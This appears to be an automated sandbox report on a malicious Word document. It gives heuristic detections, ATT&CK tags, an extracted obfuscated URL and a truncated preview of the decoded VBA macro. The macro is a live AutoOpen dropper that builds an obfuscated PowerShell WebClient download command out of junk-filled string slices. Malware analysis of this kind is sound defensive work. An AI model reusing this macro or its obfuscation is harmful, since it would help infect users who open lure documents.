MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute external commands. The script also appears to be constructing a URL from concatenated strings, which is likely used to download a secondary payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further suggests a phishing or lure-based dropper.
Heuristics 7
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://c3y+c3ywww.blueyacD4G+D4GhtchartD4G+D4c3y+c3yGer.coD4G+D4Gm/c3y In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24155 bytes |
SHA-256: b2aacc79f4f58cbcd8712be2d2491e5c9881442a1c7d4dfeb9674dee83d6e0fa |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "HVpFnmFF"
Sub AutoOpen()
On Error Resume Next
ITSEREIbU = jociVzYGDtRWLw - OBYkOqfCo / (4327992 + TflPnTZwjXXbZw - 3432356 + kQFlITqCCkr)
FFAmnHXjs = nFzwPPqraw - wPulikpAojND / (5464573 + qikjTBSZGw - 2012786 + osDAKclG)
JqGAFWifD = aBUdYhFIHwSX - wbavwwoY / (7108269 + WKAckdwTn - 4314882 + WInLUWvCUo)
Application.Run "wrTPYEmLACm", LuQPFKHUKuJWn
oljHZiblj = MpjwSXEVi - diAobSnk / (5509176 + sWQiiYTUKz - 4102829 + EHHjZotwRaXJ)
LJlsfGrqI = WqZEQtDk - fpuatjvt / (9707223 + jISwGTYnboEHi - 5047038 + kRHUXAshPsTQir)
End Sub
Function LuQPFKHUKuJWn()
On Error Resume Next
sSSljX = ZGNMHXmkwJQj - VzXdkHotKdm / (8097865 + TqzzVofVGiJi - 4190318 + EKLNZsvIDQ)
sRpQiZRQTE = NHTsPcb - aDvkzocEFO / (2782639 + uPjjiwQMz - 7142596 + mjvIjMcr)
NtEdSM = iLvUJaM - wnptpCIwYk / (2044628 + LOYpsJBDf - 9314745 + dXIfjUOZImrQK)
CRttwbip = rvJWqbXiAnjwPH + Mid(("IpPRiF hWGODR+[CHAR]78),[CHAR]39 -CrEplacE'AVT',[CHAR]36)) drFjNUXi"), 14, 47)
qBkrHCvL = YJtzvMWhWZiJKC - TzOuaLUPVoQ / (2260995 + NLvOmZjdwQOivQ - 1903187 + fwRPwaVYL)
XpYbzw = nEtXLfA - TKdPXkTAVh / (71529 + fvKBqpww - 75907 + qXDkmfkbEiiW)
DYHstiBYkIq = wkQahwwFoYzWst - hVhEYhUGLmwnQ / (8904430 + RcJzLQZOQAE - 6347379 + zDOtmst)
GjiDiVc = RzjnJIbRauTnFc + Mid(("rwSJUfiLBMlupXyNSBc3y+c3y + '+'65N+65bKuMwmUIwjNspnirmjZiqjwL"), 15, 23)
YOurhLhdO = GWMshbHG - DUASGIXEB / (4645320 + tQwLkhl - 4141917 + hsYVqsjBAEQ)
tnhbv = ckacOMXwQiGH - SpYBIAql / (6171024 + LvibObVDzHNR - 6176729 + iVVNZKDlRL)
ZcwoZT = DIAsEaAwCP - kkJUuaJzwBJA / (3540033 + icMVfaiTEKSV - 2222101 + hNVdIBllEEQcb)
UTLISFMZB = BizOiiEojIfL + Mid(("OfBtJdHzHMJvMHCbNhSOwnKfach(x2D4G+c3y+c3yD4G0asfc in D4G+D4G'+'x20ADCX){D4G+D4Gt'+'ryc3y+c3y{x2D4G+D4G0YYDWMnjBOpIuj"), 25, 82)
jGvPnz = WpCQjzBYPRS - jfsQBtYHFDwN / (957732 + QKmGSjYuHTzV - 963453 + CrMKwiq)
lwUnalqV = PREjZjVTq - LwiqmJwiKlYYR / (6190448 + TENqnOarBuVCm - 1974944 + YncKJGWLFDMQU)
NvbcmD = qrAXrGc - dDalHjwQ / (1306413 + YSMkwHWi - 9425800 + ImawGmLDViuEQ)
nnEGnkwn = OWuHiFZzo + Mid((" PsfGWjkRIHM[ChAR]70+[Chc3y+c3yAR]105+[ChAR]11665N+65N),'+'[ChAR]39c3y+c3y 65N+65N-CrepLaCE Dc3y+c3y4Ge5tD4G,['+'ChAR]965N+65N2 -rePlACeD4IhzSSzRuqdTBzjKvtHWZEtUoP"), 13, 128)
siLcdaTwj = sBsFvsA - JjzqccfV / (4173864 + vcSUBvaXXzjHc - 3770453 + aFEuFIcdkvjRU)
wCIcmERUOT = HsdTXtUiYzwfXV - aBGjABW / (5233407 + QjTwhYUiGbP - 1304258 + nFaVshEz)
UbwvbLtni = kGbKtakTul - BDnaVAzfR / (4861489 + GuTNBFiIoWdqwM - 4421879 + futmjdpEkR)
OqWCQw = KYkXwpPow + Mid(("TKH+D4Git) D4G+D4GSyst'+'em.Net.WeD4G+D4GbD4G+D4GCl65N+65Nient;x20NSD4'+'G+D4GBD'+'4G+D4G = x20nsadaczzbfSfGSzJ"), 4, 97)
lmMbdRBd = jrfZfpl - uYNoNwdUkYnPcF / (2855993 + jFiQGzzpKMq - 6131709 + VOzvjvjXdmBOOo)
cfXlGKmt = NZXbcCqZ - UqwaXiBI / (9585328 + PJpTvJiGFS - 5761478 + rJpckoO)
cDtKt = ziomaqw - zwksQtZ / (9657167 + FbRtvkHjSz - 7588201 + vtNtuXkVDsFK)
XhwZwRV = zsiZjAo + Mid(("MSOJovRbOpGfClivXfG65N+6'+'5NOxND4G,[ChAR]96 -c3Sqv"), 19, 31)
rinjwcFX = KBuhGIrLTEFXwW - odUMWGQpdZ / (8992658 + BDuqOAwjVqnw - 7067200 + zJBBKmPav)
NvhzI = jSqqtMQIL - pHZOqXCmBwp / (4670625 + HHGncPHRaIf - 1326203 + JFqIZfkJYrjnLm)
vNAjSvVr = cZwYLqjjnZot - JPztHtO / (9320885 + sYKnSiPWzQcXpA - 2249325 + vGZWCjkm)
pkkRTOTtYGB = GGhllzjrEiM + Mid(("WsqdYMUDAiRXnzsTvbQzzzJ"), 12, 1)
zuHYMNRb = XATQZXQjUP - mLmoatIoXHSZX / (6307626 + zEjJTntXj - 4826045 + mJMWAfu)
BfsdjfqbPPi = DUijNmY - qQEawjGYLwLv / (9954690 + oDPXHwbBGnfSd - 9682711 + VVWuECHiwF)
cCpQfh = DoKDUwE - jbTpiaIo / (1869923 + vdGIDpboB - 9106968 + jYRSFvmqDThOT)
wsmwIODnSPP = zJsqjRXojhXO + Mid(("fswzbCWbsFniuRSSKJ4U/uzLLsjuTNPwGSCJAwkK"), 19, 3)
sBmhFfN = cwulVbf - JTzCBXZiVzGzNP / (7569032 + JmvwizcjLOpJA - 302298 + bnlEzSrAHS)
izocd = aQrPpMIEbijjO - qQrniQiT / (5473702 + KcKnYSmodtY - 2332692 + vZdAvamvEXuIC)
ASRHq = NZCKHoM
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.